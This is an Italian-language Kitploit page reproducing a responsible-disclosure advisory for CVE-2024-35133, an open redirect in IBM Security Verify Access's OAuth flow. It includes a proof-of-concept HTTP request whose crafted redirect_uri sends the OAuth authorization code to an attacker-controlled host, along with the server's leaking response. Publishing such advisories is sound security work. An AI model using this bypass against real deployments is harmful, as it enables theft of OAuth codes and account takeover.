Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — Bollettino di sicurezza per CVE-2024-35133 - Con PoC | Kitploit
Strumenti/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Bollettino di sicurezza per CVE-2024-35133 - Con PoC

Vedi Repository
211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

IBM Security Verify Access - Reindirizzamento Aperto durante il Flusso OAuth (CVE-2024-35133)

Indice

  1. Panoramica
  2. Descrizione Dettagliata
  3. Proof of Concept
  4. Soluzione
  5. Cronologia della Divulgazione
  6. Riferimenti
  7. Crediti
  8. Note Legali

Panoramica

Revisione: 1.0
Impatto:
Persuadendo una vittima a visitare un sito web appositamente predisposto, un attaccante remoto potrebbe sfruttare questa vulnerabilità per falsificare l'URL visualizzato e reindirizzare l'utente verso un sito web malevolo. Ciò potrebbe consentire all'attaccante di ottenere informazioni altamente sensibili o di condurre ulteriori attacchi contro la vittima.

Gravità:

  • NIST: Alto
  • IBM: Medio

Punteggio CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Fornitore: IBM

Prodotti Interessati:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Versioni Interessate: 10.0.0 - 10.0.8

Descrizione del Prodotto

IBM Security Verify Access è una soluzione completa per la gestione delle policy di autorizzazione e sicurezza di rete. Fornisce una protezione end-to-end delle risorse su intranet ed extranet geograficamente disperse.

Alcune caratteristiche chiave includono:

  • Autenticazione: Ampia gamma di autenticatori integrati e supporto per autenticatori esterni.
  • Autorizzazione: Decisioni sicure di permesso e negazione per le richieste di risorse protette.
  • Sicurezza dei Dati e Gestione Centralizzata delle Risorse: Gestisce l'accesso sicuro alle risorse di rete interne utilizzando la connettività Internet pubblica tramite un sistema firewall aziendale.

Descrizione Dettagliata

Durante un test di penetrazione del flusso OAuth per un cliente, è stata scoperta una vulnerabilità di Reindirizzamento Aperto, che consentiva la perdita della variabile "code" di OAuth.

Eludendo la logica del parser responsabile della verifica del parametro "redirect_uri" durante un flusso OAuth (sfruttando RFC 3986), l'attaccante poteva manipolare il filtro della whitelist dei domini in IBM Security Verify Access. Ciò ha provocato un reindirizzamento aperto verso qualsiasi dominio arbitrario controllato dall'attaccante. La vittima poteva essere reindirizzata a un sito malevolo mentre il dominio appariva come attendibile.

Ciò potrebbe portare all'esposizione di informazioni sensibili come il token "code" di OAuth o ad ulteriori attacchi contro la vittima.


Proof of Concept

Richiesta

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Risposta

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Soluzione

Fare riferimento al Bollettino di Sicurezza IBM 7166712 per informazioni su patch, aggiornamento o soluzione alternativa suggerita.
Vedere Riferimenti per maggiori dettagli.


Cronologia della Divulgazione

  • 19/03/2024: Vulnerabilità scoperta dal Ricercatore di Sicurezza (Giulio Garzia)
  • 21/03/2024: Vulnerabilità condivisa con il cliente che utilizza IBM Security Verify Access
  • 02/04/2024: Vulnerabilità segnalata a IBM
  • 14/05/2024: Vulnerabilità confermata da IBM
  • 18/07/2024: Patch di pre-rilascio fornita da IBM al cliente
  • 27/08/2024: Bollettino di Sicurezza e vulnerabilità condivisi da IBM

Riferimenti

  1. Bollettino di Sicurezza IBM CVE-2024-35133
  2. Database delle Vulnerabilità IBM X-Force
  3. NIST CVE-2024-35133
  4. CWE-178: Gestione Impropria dell'URL

Crediti

Questa vulnerabilità è stata scoperta e segnalata da:

  • Giulio Garzia
    LinkedIn
    GitHub

Note Legali

Copyright (c) 2024 Giulio Garzia "Ozozuz"

È concessa l'autorizzazione per la ridistribuzione elettronica di questo avviso. Non può essere modificato senza esplicito consenso scritto. Per ottenere il permesso di ristampare questo avviso su altri media, contattare l'autore.

Disclaimer: Le informazioni contenute in questo avviso sono accurate al momento della pubblicazione sulla base dei dati disponibili. Non vengono fornite garanzie. Né l'autore né l'editore accettano responsabilità per danni diretti, indiretti o consequenziali derivanti dall'uso di queste informazioni.

Scarica lo strumento